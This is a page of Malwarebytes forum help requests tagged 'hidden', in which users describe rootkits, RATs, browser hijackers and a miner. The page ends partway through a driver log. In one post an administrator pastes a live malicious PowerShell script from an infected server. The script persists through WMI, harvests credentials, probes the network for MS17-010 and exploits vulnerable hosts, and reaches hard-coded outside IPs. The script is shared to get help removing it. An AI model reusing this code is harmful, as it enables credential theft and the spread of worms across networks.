Showing results for tags 'hidden'.

Found 16 results

  1. Here are the logs you need. I have no idea where I got the RAT from since I didn't download anything sketchy. I did a full system reset with settings to try and get rid of it, but apparently they can survive those, so I want to get rid of all rootkits / RATs / hidden malware on my PC. Thank you in advance! Addition.txt FRST.txt malwarebytes log.txt
  2. Hi, so one day I was playing Minecraft and almost took a break, but somebody was moving my mouse! So I went into airplane mode and scanned around but didn't find anything. I reset my PC with settings, and I read that RATs can survive resets, so I want to rid my system of all rootkits and RATs and hidden malware.
  3. Hey Malwarebytes team/forum. Recently I've been receiving notifications from Malwarebytes saying that it has blocked an inbound connection. Great! That means it's doing its job. Or at least until yesterday, when I took an extra moment to see what exactly it was blocking. Upon inspection of the notifications I saw several from the Steam gaming platform, and one from Nvidia container. Yesterday I tried looking into this blocked connection that was using Nvidia and tried posting to the forum, only to be blocked by the forum's spam filter, oh well. So I took it into my own hands and uninstalled GeForce Experience and manually removed the folder containing the Nvidia container inside the Nvidia Corporation folder, just to be safe, since I don't use the features provided by GeForce Experience aside from the FPS overlay, then called it a day. That is until just now, when I got another block, this time in regards to another inbound connection, this time using the program Spotify. Now I'm familiar with Steam, Nvidia, and Spotify, as one is my game client, one is my graphics card, and another is my music program. What concerns me is that the inbound connections are not associated with any site or host name, only an IP address. So I googled the IP address and a few results came back with China (minus one from a data center in Canada). Each notification lists the program behind these inbound connections and the file's location, all back to the actual programs' .exe's. Bummer, I was hoping for an easy uninstall of some fake programs. So after some digging I found that this time (the block using Spotify) the file location was inside the "WindowsApps" folder (which is permission blocked by "TrustedInstaller", a default outdated Windows process [from my understanding]). This concerns me even more and I really don't want to try gaining access only to accidentally break something.
     So, now convinced that I in fact do have a Trojan and it is attempting to receive network communication via legitimate applications, I have come to this forum in search of more professional help. Once the Malwarebytes scan is finished I will attach the result of the Malwarebytes scan, the AdwCleaner scan, the FRST.txt / Addition.txt, and the notifications (in .txt) from Malwarebytes. Then I will submit this post and hope that the weirdness yesterday with the forum's spam filter is done. FRST.txt Addition.txt AdwCleaner[S24].txt scan export.txt notifcation.txt notifcation(1).txt notifcation(2).txt notifcation(3).txt notifcation(4).txt notifcation(5).txt notifcation(6).txt
  4. A few days ago I restarted my computer after a long time without restarting it (like 1 week with the PC on) and I noticed that "Explorer.exe" was requesting to initialize, but the real explorer.exe task was already running... I said no, but then I checked the directory of the file and the system said that the file was in %windir%/resources/themes. Well, going into the folder to check if the file exists, I noticed that there's nothing more than Aero themes in this folder. So I did a scan of the folder using Malwarebytes and it recognized svchost.exe malware and explorer.exe. Before adding them to quarantine I wanted to check why the files didn't appear, so I enabled "show hidden folders" in Explorer (the real one, from Microsoft) and it changed nothing. Well, so I tried to open the file by typing %windir%/resources/themes/explorer.exe in the Explorer path; it worked, but I was still incapable of seeing this file... So I started CMD as admin and did " cd " to %windir%/resources/themes and did " dir " inside the folder. As I expected, dir shows the same as Explorer, but 2 new items appeared that were named " . " and " .. ". I deleted both successfully. Searching for this on the internet I found that there's another way to hide files in Windows, which is adding them to the "important system files or protected system files" list, and following the instructions to disable this privilege, I finally could see the files. Well, I added them to the quarantine list and continued using my computer, until yesterday, when I realized that every time Malwarebytes sends two adwares to quarantine (I left the results of the scan in the post as "Annoying addware.txt") they come back right after I finish the task... When trying to solve these issues I realized many things...
     1- I can't use commands such as DISM, sfc /scannow, Windows Update, Windows Defender (I will write what happens when I try to use them below this part), net start/stop wuauserv (the wuauserv service doesn't even exist in the registry; I didn't check the Windows Defender one...)
     2- There was a folder called QEMU hidden with the "important system files" method. I deleted all content inside and then deleted the folder after taking out the folder privileges.
     3- There are two "program" files in the "Inicialize" section of Task Manager which I can't go to properties on (I dropped the print in the attached files named as "Program" unknown files).
     When I try to use DISM with /checkhealth everything goes fine, but when I try to use DISM with /restorehealth it stops at 87.5% and gives an error 1060 message saying " the specified service does not exist as an installed service " (I left the DISM log file right below, named DISM.txt). When I try to use sfc /scannow it says that it cannot fix all issues. When I try to use Windows Update it says that my organization disabled Windows Updates (?). When I try Windows Defender it just goes black screen on the window. Well, it would be great if someone could help me; I don't really want to reinstall Windows... It would take a month to set up my PC again. Also, I run Windows 10 Pro 64-bit, version 1809... dism.log Annoying Adware.txt Rkill.txt FRST.txt Addition.txt
  5. Hello, as described in the "I'm infected" topic (https://forums.malwarebytes.com/topic/9573-im-infected-what-do-i-do-now/) I followed all the instructions; I now need help to know what to do, please. The laptop has been very slow for a long time, but I want to clear everything now. Basically, when I run an analysis with Malwarebytes or Kaspersky Antivirus or any software of this kind it doesn't find anything, but I see it: the PC is very, very slow and isn't too old; on top of that it has great components (Nvidia 740M, Intel Core i7 etc.), that's why after doing some research on the subject I think it's a rootkit. Using HitmanPro too, on a random automatic daily analysis it managed to find a threat that I couldn't delete, which neither Malwarebytes nor Kaspersky found afterwards. Please help; the files asked for in the topic should be uploaded. Thank you for your attention, I hope the problem can be solved, thank you again. Addition.txt FRST.txt Malwarebytes.txt
  6. Hi, I desperately need help here. I am using Malwarebytes Premium installed on Windows 10 build 1809. Somehow this malware got through and it has been very persistent. Malwarebytes scans do not detect it, and even after a system reset it comes back. I notice that there are folders that should not be there and suspect that the virus has created a virtual drive from which to launch a fake copy of my Windows system. The reason why I suspect I am infected is that every time I click on an application file, I get a pop-up with Chinese characters. So far it has been an irritant because it seems to run on a schedule. However, running programs from the Desktop seems to bypass the virus for a short period of time. Scanning with both Windows Defender and Malwarebytes reveals nothing and I fear both have been compromised. Running Trend Micro's Anti-Threat Toolkit picked out 14 threats. But even after cleaning the system after that and rebooting, the malware is still back in force. Please help. Or should I just opt for the nuclear option and completely format my SSD drive and reinstall Windows from a USB? I have a Lenovo Thinkpad X10 Yoga. Thanks in advance.
  7. So, I came to know about this issue yesterday when I returned from school and used my laptop. All the files and folders except the C drive are hidden and there is a shortcut of everything. I click on the shortcut and then I can access the file. But when I try to copy anything from the laptop to USB, only shortcuts are being copied. Also, an .exe file is being created with the name of the folder and file. Third, when I tried to show all the system protected files and folders, a heap of files and folders came up on the disk. Don't really know what went wrong. The day before yesterday, I inserted my friend's USB into the laptop. I think this might be the reason for this. Any help would be highly appreciated as I have to clean my laptop and don't want to lose any file whatsoever. Thanks, Steve.
  8. Hello, I have been having an issue with our server at work recently and can't get to the bottom of it. Two PowerShell windows keep opening in the background running a script, one of which is consuming a lot of CPU power. I can end the task or suspend the process but it always returns. This machine hosts a domain and several users log into this server via Remote Desktop on the default port 3389. These are the scripts - the first one is the one using 70% of the CPU - the second one always appears first:
     "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -W Hidden "$mon = ([WmiClass] 'root\default:Office_Updater').Properties['mon'].Value;$funs = ([WmiClass] 'root\default:Office_Updater').Properties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs)));Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($mon, $mon, 'Void', 0, '', '')"
     powershell.exe -NoP -NonI -W Hidden -E
     $stime=[Environment]::TickCount
     $funs = ([WmiClass] 'root\default:Office_Updater').Properties['funs'].Value
     $defun=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs))
     iex $defun

     Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Object {$_.filter -notmatch 'SCM Event Logs'} |Remove-WmiObject
     $dirpath=$env:SystemRoot+'\system32'
     if  (!(test-path $dirpath )){
     	$dirpath=$env:SystemRoot
     }
     if (!(test-path ($dirpath+'\msvcp120.dll')))
     {sentfile ($dirpath+'\msvcp120.dll') 'vcp'}
     if (!(test-path ($dirpath+'\msvcr120.dll')))
     {sentfile ($dirpath+'\msvcr120.dll') 'vcr'}

     [array]$psids= get-process -name powershell |sort cpu -Descending| ForEach-Object {$_.id}
     $tcpconn = netstat -anop tcp
     $exist=$False
     if ($psids -ne $null )
     {
     	foreach ($t in $tcpconn)
     	{
     		$line =$t.split(' ')| ?{$_}
     		if ($line -eq $null)
     		{continue}
     		if (($psids[0] -eq $line[-1]) -and $t.contains("ESTABLISHED") -and ($t.contains(":80 ") -or $t.contains(":14444")) )
     		{
     			$exist=$true
     			break
     		}
     	}
     }
     foreach ($t in $tcpconn)
     	{
     		$line =$t.split(' ')| ?{$_}
     		if (!($line -is [array])){continue}
     		if (($line[-3].contains(":3333") -or $line[-3].contains(":5555")-or $line[-3].contains(":7777")) -and $t.contains("ESTABLISHED"))
     		{
     			$evid=$line[-1]
     			Get-Process -id $evid | stop-process -force
     		}
     	}
     if (!$exist -and ($psids.count -le 8))
     {
     	$cmdmon="powershell -NoP -NonI -W Hidden `"`$mon = ([WmiClass] 'root\default:Office_Updater').Properties['mon'].Value;`$funs = ([WmiClass] 'root\default:Office_Updater').Properties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(`$funs)));Invoke-Command  -ScriptBlock `$RemoteScriptBlock -ArgumentList @(`$mon, `$mon, 'Void', 0, '', '')`""
     	$vbs = New-Object -ComObject WScript.Shell
     	$vbs.run($cmdmon,0)
     }

     $NTLM=$False
     $mimi = ([WmiClass] 'root\default:Office_Updater').Properties['mimi'].Value
     $a, $NTLM= Get-creds $mimi $mimi

     $Networks = Get-WmiObject Win32_NetworkAdapterConfiguration -EA Stop | ? {$_.IPEnabled}
     $ipsu = ([WmiClass] 'root\default:Office_Updater').Properties['ipsu'].Value
     $i17 = ([WmiClass] 'root\default:Office_Updater').Properties['i17'].Value
     $scba= ([WmiClass] 'root\default:Office_Updater').Properties['sc'].Value
     [byte[]]$sc=[System.Convert]::FromBase64String($scba)
     foreach ($Network in $Networks)
     {
     	$IPAddress = $Network.IpAddress[0]
     	if ($IPAddress -match '^169.254'){continue}
     	$SubnetMask = $Network.IPSubnet[0]
     	$ips=Get-NetworkRange $IPAddress $SubnetMask
     	$tcpconn = netstat -anop tcp
     	foreach ($t in $tcpconn)
     	{
     		$line =$t.split(' ')| ?{$_}
     		if (!($line -is [array])){continue}
     		if ($line.count -le 4){continue}
     		$i=$line[-3].split(':')[0]
     		if ( ($line[-2] -eq 'ESTABLISHED') -and  ($i -ne '127.0.0.1') -and ($ips -notcontains $i))
     		{
     			$ips+=$i
     		}
     	}
     	if (([Environment]::TickCount-$stime)/1000 -gt 5400){break}
     	$se=@('107.179.67.243','172.247.116.8')
     	$nic='118.184.48.95'
     	foreach($t in $se)
     	{
     		$pin=test-connection $t
     		if ($pin -ne $null)
     		{
     			$nic=$t
     			break
     		}
     	}
     	$nic=$nic+":8000"

     	foreach ($ip in $ips)
     	{
     		if (([Environment]::TickCount-$stime)/1000 -gt 5400){break}
     		if ($ip -eq $IPAddress){continue}
     		if ((Test-Connection $ip -count 1) -ne $null  -and $ipsu -notcontains $ip)
     		{
     			$re=0
     			if ($a.count -ne 0)
     			{ $re = test-ip -ip $ip -creds $a  -nic $nic -ntlm $NTLM }
     			if ($re -eq 1){$ipsu =$ipsu + " "+$ip}
     			else
     			{
     				$vul=[PingCastle.Scanners.m17sc]::Scan($ip)
     				if ($vul -and $i17 -notcontains $ip)
     				{
     					$res=eb7 $ip $sc
     					if (!($res -eq $true))
     					{eb8 $ip $sc}
     					$i17 = $i17 + " "+$ip
     				}
     			}
     		}
     	}
     }
     $StaticClass=New-Object Management.ManagementClass('root\default:Office_Updater')
     $StaticClass.SetPropertyValue('ipsu' ,$ipsu)
     $StaticClass.Put()
     $StaticClass.SetPropertyValue('i17' ,$i17)
     $StaticClass.Put()
     Addition.txt FRST.txt mb.txt AdwCleaner[S1].txt MyConsoleSettings.txt MyScheduledTasks.txt
  9. I am pretty positive I have a rootkit. It's a quiet and crafty sort; from the beginning there were no obvious signs of infection, there wasn't any slowing or memory leaking, no unusual traffic noted. I felt like something was off, but I couldn't pinpoint what until I got the first warning message from MBAM 3.0.6 Premium (see Exploit Blocking below). Now I notice that all my desktop icons are rearranged on relog and suddenly there is a bit of dead space at the bottom where I can no longer move any icons, though that's kind of the least of my worries. Sometimes the screen sort of freezes, almost like a screenshot, but then it clears up again right away. I'm running Windows 10 Home Premium, x64, on an Asus X756UXM. Please see all the notes below and txt files. Please note that things might be a little out of order from how I actually scanned things, because this started almost a week ago and I don't remember that far back. I believe the initial infection came from a popup/pop-under (can't recall which, sorry!) at http:// www (dot) nowvideo (dot) sx/video/11bb079eff255 while using Chrome. I run AdBlock Plus, Ghostery, and some script blocker thingie, and have all my many browsers configured to block popups, and I never have any issues on any other sites, but this one managed to get around all that. I threw everything I could think of at this but I really just feel like I'm chasing it from one corner to another. Any help would be thoroughly appreciated.
     MBAM:
     * Initial error message that an exploit was blocked in PowerShell (see txt file)
     * Scans Clean - All Scans
     * Starts up as normal, except Web Protection is shut off
     * On first load, Web Protection can be re-enabled
     * At some point, Web Protection will return to off, and Exploit Protection goes with it
     * Exploit Protection can be re-enabled, but it will switch off again
     * On attempting to re-enable Web Protection, it will forever say "Starting..." until next reboot
     ~~~ MBAR:
     * Scans clean
     ~~~ Avast:
     * Scans clean
     ~~~ TrendMicro Housecall:
     * Scans clean
     ~~~ GMER:
     * Found the following:
     Service C:\WINDOWS\system32\drivers\WdBoot.sys (*** hidden *** ) [BOOT] WdBoot <-- ROOTKIT !!!
     Service C:\WINDOWS\system32\drivers\WdFilter.sys (*** hidden *** ) [BOOT] WdFilter <-- ROOTKIT !!!
     Service C:\Program Files (x86)\Windows Defender\MsMpEng.exe (*** hidden ***) [AUTO] WinDefend <-- ROOTKIT !!!
     * Attempted deletion (through GMER) of all three, but WdBoot failed.
     ~~~ aswMBR:
     * Ran after GMER. The service below popped up, but aswMBR was unable to fix the issue (see full log).
     23:05:02.343 Service WdBoot C:\WINDOWS\system32\drivers\WdBoot.sys **LOCKED**
     * Subsequent attempts to run aswMBR result in a BSOD for the reason "Page fault in non-paged area" and then a forced restart.
     ~~~ JRT:
     * Nothing to report
     ~~~ HitmanPro:
     * Found buckets of cookies in all browsers, including Internet Explorer and Edge, which I NEVER use. All cookies were deleted. This was the initial confirmation something was up.
     ~~~ rKill:
     * A couple of issues popped up, nothing glaring... See txt.
     ~~~ ADW Cleaner:
     * No issues found
     ~~~ FRST:
     * See txt
     ~~~ RootKitRemover (McAfee):
     * Scanned Clean
     ~~~ TDSSKiller:
     * Scanned Clean
     ~~~ Bootlog:
     * See Txt
     ~~~ MBAM Chameleon:
     * Ran from safe mode, all 13 or however many buttons failed identically. See txt.
     HijackThis 2-14-17.log MBAM - Exploit Blocked.txt Notes.txt Rkill 2-13-17.txt aswMBR 2-14-17.txt BootLog 2-17-17.txt Chameleon Fail 2-15-17.txt FRST 2-14-17.txt GMER 2-15-17.log
  10. Hello, my name is Devon. Yesterday, when I started up my computer, a lot of error messages were coming up from various programs being unable to start. I restarted my system with a bit of suspicion, and all seemed well until the Chromium browser was installed without my doing anything. At this point, I did a quick scan with ESET NOD32 Antivirus 4, which turned up nothing. However, a few minutes later, the live protection picked up on two things. I didn't think to take note of them at the time, but one was a variant of some malware being detected in a change of the cmd.exe in C:\Windows\SysWOW64. I made an ESET SysRescue disc, launched into the live CD, and did a deep scan from there, which turned up nothing. I then went into Safe Mode and looked for any suspicious files. I found and deleted Chromium from my user's AppData\Local, as well as ByteFence antimalware from Program Files (I had never heard of ByteFence, let alone installed it). I am about to run scans and such with RogueKiller, Hitman Pro, Spybot S&D, Malwarebytes, and HerdProtect. I will attach those logs when I get them. In the meantime, is there anything anyone might be able to point me towards that could help? I'm going to start the scans and go bathe my dogs, so it will be about an hour before I'm back on the forums, and then probably a few more until I have any of the scan logs. Any help is much appreciated.
  11. So I'm 100% sure I have some sort of trojan or keylogger on my PC, but I can't find it anywhere. I currently use Avast and it's not picking up jack; I've looked at the current processes running... nothing. I know it's on here because I've had 2 game accounts with different emails and passwords hacked on the same day. Not sure what else to include (let me know), but any help would be greatly appreciated.
  12. The http://searchinterneat-a.akamaihd.net malware is hidden somewhere on my computer and Malwarebytes Premium does not find it. It seems to affect Chrome and Firefox, but not IE. It hijacks my home page. Can someone help, please? Addition.txt FRST.txt
  13. Hi, I am experiencing a huge dose of the startsear.info bug. Not quite sure how this has appeared on my laptop; however, I am having massive difficulty trying to completely remove this from my IE and Chrome. Steps taken thus far: I have run a Malwarebytes scan, and the below was the result.
     Malwarebytes Anti-Malware
     www.malwarebytes.org
     Scan Date: 25/04/2014
     Scan Time: 10:32:28 PM
     Logfile:
     Administrator: Yes
     Version: 2.00.1.1004
     Malware Database: v2014.04.25.04
     Rootkit Database: v2014.03.27.01
     License: Trial
     Malware Protection: Enabled
     Malicious Website Protection: Enabled
     Chameleon: Disabled
     OS: Windows 8.1
     CPU: x64
     File System: NTFS
     User: vuggzy
     Scan Type: Threat Scan
     Result: Completed
     Objects Scanned: 248954
     Time Elapsed: 14 min, 25 sec
     Memory: Enabled
     Startup: Enabled
     Filesystem: Enabled
     Archives: Enabled
     Rootkits: Disabled
     Shuriken: Enabled
     PUP: Enabled
     PUM: Enabled
     Processes: 0
     (No malicious items detected)
     Modules: 0
     (No malicious items detected)
     Registry Keys: 0
     (No malicious items detected)
     Registry Values: 1
     Backdoor.Agent.Gen, HKU\S-1-5-21-3607773301-3379652883-1464597939-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|SAVIOUR, C:\Users\vuggzy\AppData\Roaming\video.exe, , [e8a0c76781fad95d36b24b0cbe45827e]
     Registry Data: 0
     (No malicious items detected)
     Folders: 0
     (No malicious items detected)
     Files: 1
     Backdoor.Agent.Gen, C:\Users\vuggzy\AppData\Roaming\video.exe, , [e8a0c76781fad95d36b24b0cbe45827e],
     Physical Sectors: 0
     (No malicious items detected)
     (end)
     Regarding the C:\Users\vuggzy\AppData\Roaming\video.exe detection, I have tried to delete this but it keeps reappearing. I have also tried standard default amendments to Chrome and IE settings; however, this does not remove my issue. I am not very computer savvy, so please help!!! What should I do?? Cheers, vuggzy
  14. I have a trojan on my computer called trojan.bitminer. It hooks onto my svchost and makes it use up unreal CPU. It then stops my display driver from working and eventually crashes the computer. I have browsed other forums and several people have had my exact problem. They download Malwarebytes, which finds the trojan. My Malwarebytes cannot find trojan.bitminer even though it is there. Please help me with what I should do. Thanks in advance!
  15. Hereby a small suggestion to improve MBAM PRO. When scheduling a scan I'm presented with the great option to "perform (the) scheduled scan silently from system account". I really like it since it is good for the 'forget it' part of 'set it and forget it'. I also like the idea behind the option to "run a flash scan after successful update". A new database update is a good time to run a flash scan. What I don't like about it is that (when I enable it) it loads the MBAM GUI to show this scan when I'm in the middle of something. (Good for the 'set it' part, not so much for the 'forget it' part.) However, I'm currently not able to combine these settings. So I'd like to see/have the option to "run a flash scan after successful update" and "perform this scan silently from the system account". This way I can let MBAM scan when it's most effective without being interrupted. I hope I made my proposal clear and I'd love to see it in the next MBAM version.
  16. Hi there, attached is a log file from Rootkit Unhooker run on an XP Pro SP3 machine - at the bottom are TWO unknown/hidden drivers. I hope this is the correct place to post this - please let me know if the DDS log needs to be posted BEFORE anyone can help with this issue. If the DDS is required, I will run it as soon as I can and post the log.
     RkUnhooker report generator v0.7
     ==============================================
     Rootkit Unhooker kernel version: 3.7.300.505
     ==============================================
     Windows Major Version: 5
     Windows Minor Version: 1
     Windows Build Number: 2600
     ==============================================
     >Drivers
     Driver: C:\WINDOWS\system32\DRIVERS\igxpmp32.sys Address: 0xB90D0000 Size: 6320128 bytes
     Driver: C:\WINDOWS\system32\drivers\RtkHDAud.sys Address: 0xA79D4000 Size: 6103040 bytes
     Driver: C:\WINDOWS\System32\igxpdx32.DLL Address: 0xBF322000 Size: 3518464 bytes
     Driver: C:\WINDOWS\System32\igxpdv32.DLL Address: 0xBF05E000 Size: 2899968 bytes
     Driver: C:\WINDOWS\system32\ntkrnlpa.exe Address: 0x804D7000 Size: 2154496 bytes
     Driver: PnpManager Address: 0x804D7000 Size: 2154496 bytes
     Driver: RAW Address: 0x804D7000 Size: 2154496 bytes
     Driver: WMIxWDM Address: 0x804D7000 Size: 2154496 bytes
     Driver: Win32k Address: 0xBF800000 Size: 1871872 bytes
     Driver: C:\WINDOWS\System32\win32k.sys Address: 0xBF800000 Size: 1871872 bytes
     Driver: Ntfs.sys Address: 0xB9DC6000 Size: 577536 bytes
     Driver: C:\WINDOWS\system32\DRIVERS\Wdf01000.sys Address: 0xA7711000 Size: 503808 bytes
     Driver: C:\WINDOWS\system32\DRIVERS\mrxsmb.sys Address: 0xA77B4000 Size: 458752 bytes
     Driver: mfehidk.sys Address: 0xB9E6A000 Size: 454656 bytes
     Driver: C:\WINDOWS\system32\DRIVERS\update.sys Address: 0xB8F0E000 Size: 385024 bytes
     Driver: C:\WINDOWS\system32\DRIVERS\tcpip.sys Address: 0xA78D4000 Size: 364544 bytes
     Driver: C:\WINDOWS\system32\DRIVERS\srv.sys Address: 0xA6918000 Size: 360448 bytes
     Driver: C:\WINDOWS\System32\ATMFD.DLL Address: 0xBF67D000 Size: 290816 bytes
     Driver: C:\WINDOWS\System32\Drivers\HTTP.sys Address: 0xA59FB000 Size: 266240 bytes
     Driver: C:\WINDOWS\System32\igxpgd32.dll Address: 0xBF024000 Size: 237568 bytes
     Driver: C:\WINDOWS\system32\DRIVERS\k57xp32.sys Address: 0xB905E000 Size: 221184 bytes
     Driver: C:\WINDOWS\system32\DRIVERS\rdpdr.sys Address: 0xB8F6C000 Size: 196608 bytes
     Driver: ACPI.sys Address: 0xB9F79000 Size: 188416 bytes
     Driver: C:\WINDOWS\system32\DRIVERS\mrxdav.sys Address: 0xA6A60000 Size: 184320 bytes
     Driver: NDIS.sys Address: 0xB9D99000 Size: 184320 bytes
     Driver: C:\WINDOWS\system32\drivers\mfeavfk.sys Address: 0xB8FC4000 Size: 176128 bytes
     Driver: C:\WINDOWS\system32\DRIVERS\rdbss.sys Address: 0xA7824000 Size: 176128 bytes
     Driver: C:\WINDOWS\system32\DRIVERS\HDAudBus.sys Address: 0xB9094000 Size: 163840 bytes
     Driver: C:\WINDOWS\system32\DRIVERS\netbt.sys Address: 0xA7871000 Size: 163840 bytes
     Driver: dmio.sys Address: 0xB9F23000 Size: 155648 bytes
     Driver: C:\WINDOWS\system32\DRIVERS\ipnat.sys Address: 0xA7899000 Size: 155648 bytes
     Driver: C:\WINDOWS\system32\drivers\portcls.sys Address: 0xA79B0000 Size: 147456 bytes
     Driver: C:\WINDOWS\system32\DRIVERS\USBPORT.SYS Address: 0xB903A000 Size: 147456 bytes
     Driver: C:\WINDOWS\system32\DRIVERS\ks.sys Address: 0xB9017000 Size: 143360 bytes
     Driver: C:\WINDOWS\System32\Drivers\RDPWD.SYS Address: 0xA5708000 Size: 143360 bytes
     Driver: C:\WINDOWS\System32\drivers\afd.sys Address: 0xA784F000 Size: 139264 bytes
     Driver: ACPI_HAL Address: 0x806E5000 Size: 134528 bytes
     Driver: C:\WINDOWS\system32\hal.dll Address: 0x806E5000 Size: 134528 bytes
     Driver: fltMgr.sys Address: 0xB9EEB000 Size: 131072 bytes
     Driver: ftdisk.sys Address: 0xB9F49000 Size: 126976 bytes
     Driver: C:\WINDOWS\system32\drivers\mfeapfk.sys Address: 0xA55CA000 Size: 114688 bytes
     Driver: Mup.sys Address: 0xB9D7F000 Size: 106496 bytes
     Driver: atapi.sys Address: 0xB9F0B000 Size: 98304 bytes
     Driver: C:\WINDOWS\System32\Drivers\dump_atapi.sys Address: 0xA76F9000 Size: 98304 bytes
     Driver: KSecDD.sys Address: 0xB9E53000 Size: 94208 bytes
     Driver: C:\WINDOWS\system32\DRIVERS\ndiswan.sys Address: 0xB9000000 Size: 94208 bytes
     Driver: C:\WINDOWS\system32\drivers\mfetdi2k.sys Address: 0xA78BF000 Size: 86016 bytes
     Driver: C:\WINDOWS\system32\drivers\wdmaud.sys Address: 0xA6ADB000 Size: 86016 bytes
     Driver: C:\WINDOWS\system32\DRIVERS\VIDEOPRT.SYS Address: 0xB90BC000 Size: 81920 bytes
     Driver: C:\WINDOWS\system32\DRIVERS\ipsec.sys Address: 0xA792D000 Size: 77824 bytes
     Driver: C:\WINDOWS\System32\drivers\dxg.sys Address: 0xBF000000 Size: 73728 bytes
     Driver: C:\WINDOWS\System32\igxprd32.dll Address: 0xBF012000 Size: 73728 bytes
     Driver: sr.sys Address: 0xB9ED9000 Size: 73728 bytes
     Driver: pci.sys Address: 0xB9F68000 Size: 69632 bytes
     Driver: C:\WINDOWS\system32\DRIVERS\psched.sys Address: 0xB8FEF000 Size: 69632 bytes
     Driver: C:\WINDOWS\System32\Drivers\Cdfs.SYS Address: 0xBA2B8000 Size: 65536 bytes
     Driver: C:\WINDOWS\system32\DRIVERS\cdrom.sys Address: 0xB96E7000 Size: 65536 bytes
     Driver: C:\WINDOWS\system32\DRIVERS\serial.sys Address: 0xB9707000 Size: 65536 bytes
     Driver: C:\WINDOWS\system32\drivers\drmk.sys Address: 0xBA1A8000 Size: 61440 bytes
     Driver: C:\WINDOWS\system32\DRIVERS\redbook.sys Address: 0xB96D7000 Size: 61440 bytes
     Driver: C:\WINDOWS\system32\drivers\sysaudio.sys Address: 0xA6C10000 Size: 61440 bytes
     Driver: C:\WINDOWS\system32\DRIVERS\usbhub.sys Address: 0xBA178000 Size: 61440 bytes
     Driver: C:\WINDOWS\system32\DRIVERS\CLASSPNP.SYS Address: 0xBA0E8000 Size: 53248 bytes
     Driver: C:\WINDOWS\system32\drivers\mfebopk.sys Address: 0xA5616000 Size: 53248 bytes
     Driver: C:\WINDOWS\system32\DRIVERS\rasl2tp.sys Address: 0xBA128000 Size: 53248 bytes
     Driver: VolSnap.sys Address: 0xBA0C8000 Size: 53248 bytes
     Driver: C:\WINDOWS\system32\DRIVERS\WDFLDR.SYS Address: 0xBA218000 Size: 53248 bytes
     Driver: C:\WINDOWS\system32\drivers\mfetdik.sys Address: 0xBA1D8000 Size: 49152 bytes
     Driver: C:\WINDOWS\system32\DRIVERS\raspptp.sys Address: 0xBA148000 Size: 49152 bytes
     Driver: C:\WINDOWS\System32\Drivers\Fips.SYS Address: 0xBA1F8000 Size: 45056 bytes
     Driver: C:\WINDOWS\system32\DRIVERS\imapi.sys Address: 0xB96F7000 Size: 45056 bytes
     Driver: MountMgr.sys Address: 0xBA0B8000 Size: 45056 bytes
     Driver: C:\WINDOWS\system32\DRIVERS\raspppoe.sys Address: 0xBA138000 Size: 45056 bytes
     Driver: isapnp.sys Address: 0xBA0A8000 Size: 40960 bytes
     Driver: C:\WINDOWS\system32\drivers\LMIRfsDriver.sys Address: 0xA6C40000 Size: 40960 bytes
     Driver: C:\WINDOWS\System32\Drivers\NDProxy.SYS Address: 0xBA188000 Size: 40960 bytes
     Driver: C:\WINDOWS\system32\DRIVERS\termdd.sys Address: 0xBA168000 Size: 40960 bytes
     Driver: disk.sys Address: 0xBA0D8000 Size: 36864 bytes
     Driver: C:\WINDOWS\system32\DRIVERS\HIDCLASS.SYS Address: 0xBA208000 Size: 36864 bytes
     Driver: C:\WINDOWS\system32\DRIVERS\intelppm.sys Address: 0xB9717000 Size: 36864 bytes
     Driver: C:\WINDOWS\system32\DRIVERS\msgpc.sys Address: 0xBA158000 Size: 36864 bytes
     Driver: C:\WINDOWS\system32\DRIVERS\netbios.sys Address: 0xBA1E8000 Size: 36864 bytes
     Driver: C:\WINDOWS\system32\DRIVERS\wanarp.sys Address: 0xBA2A8000 Size: 36864 bytes
     Driver: C:\WINDOWS\System32\Drivers\Npfs.SYS Address: 0xBA468000 Size: 32768 bytes
     Driver: C:\WINDOWS\system32\DRIVERS\usbccgp.sys Address: 0xBA378000 Size: 32768 bytes
     Driver: C:\WINDOWS\system32\DRIVERS\usbehci.sys Address: 0xBA408000 Size: 32768 bytes
     Driver: C:\WINDOWS\system32\DRIVERS\HIDPARSE.SYS Address: 0xBA450000 Size: 28672 bytes
     Driver: C:\WINDOWS\system32\DRIVERS\NuidFltr.sys Address: 0xBA480000 Size: 28672 bytes
     Driver: C:\WINDOWS\system32\DRIVERS\PCIIDEX.SYS Address: 0xBA328000 Size: 28672 bytes
     Driver: C:\WINDOWS\system32\DRIVERS\usbprint.sys Address: 0xBA470000 Size: 28672 bytes
     Driver: C:\WINDOWS\system32\DRIVERS\kbdclass.sys Address: 0xBA428000 Size: 24576 bytes
     Driver: C:\WINDOWS\system32\DRIVERS\mouclass.sys Address: 0xBA430000 Size: 24576 bytes
     Driver: C:\WINDOWS\System32\Drivers\rkhdrv40.SYS Address: 0xBA4A0000 Size: 24576 bytes
     Driver:
